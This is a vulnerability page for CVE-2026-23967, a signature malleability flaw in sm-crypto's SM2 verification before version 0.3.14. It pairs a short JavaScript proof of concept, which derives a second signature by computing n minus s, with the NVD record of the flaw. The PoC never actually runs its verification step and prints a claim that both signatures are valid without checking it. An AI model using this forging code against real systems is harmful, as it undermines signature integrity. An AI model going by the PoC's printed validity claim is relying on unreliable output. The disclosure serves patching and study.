CVE-2026-23967

// CVE-2026-23967 Signature Malleability PoC // Affected: sm-crypto < 0.3.14 const sm2 = require('sm-crypto').sm2; const { ec: EC } = require('elliptic'); const curve = new EC('sm2'); function exploitSignatureMalleability() { // Original signature from victim const originalSignature = { r: '6486d8e2b2b7c2e4d6f8a1b3c5d7e9f0a2b4c6d8e0f2a4b6c8d0e2f4a6b8c0d2', s: '8b3c5d7e9f1a3b5c7d9e1f3a5b7c9d1e3f5a7b9c1d3e5f7a9b1c3d5e7f9a1' }; // Get the SM2 curve order (n) const n = curve.n.toString(16); // Calculate s' = n - s (the malleated signature value) const nBigInt = BigInt('0x' + n); const sBigInt = BigInt('0x' + originalSignature.s); const sPrime = (nBigInt - sBigInt).toString(16); // New valid signature const malleatedSignature = { r: originalSignature.r, s: sPrime }; console.log('Original Signature:', originalSignature); console.log('Malleated Signature:', malleatedSignature); console.log('Both signatures are valid for the same message!'); return malleatedSignature; } // Verification that both signatures pass function verifyBothSignatures(message, signature) { const publicKey = 'your-public-key-here'; // Victim's public key const verify1 = sm2.verify(publicKey, message, signature); console.log('Signature verification result:', verify1); } exploitSignatureMalleability();

{"cve": {"id": "CVE-2026-23967", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.167", "lastModified": "2026-02-25T15:31:26.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature malleability vulnerability exists in the SM2 signature verification logic of the sm-crypto library prior to version 0.3.14. An attacker can derive a new valid signature for a previously signed message from an existing signature. Version 0.3.14 patches the issue."}, {"lang": "es", "value": "sm-crypto proporciona implementaciones de JavaScript de los algoritmos criptográficos chinos SM2, SM3 y SM4. Existe una vulnerabilidad de maleabilidad de firma en la lógica de verificación de firma SM2 de la librería sm-crypto anterior a la versión 0.3.14. Un atacante puede derivar una nueva firma válida para un mensaje previamente firmado a partir de una firma existente. La versión 0.3.14 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juneandgreen:sm-crypto:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.3.14", "matchCriteriaId": "902F9DFD-B5BC-4BF4-9AF2-CB42F616B3D4"}]}]}], "references": [{"url": "https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-qv7w-v773-3xqm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}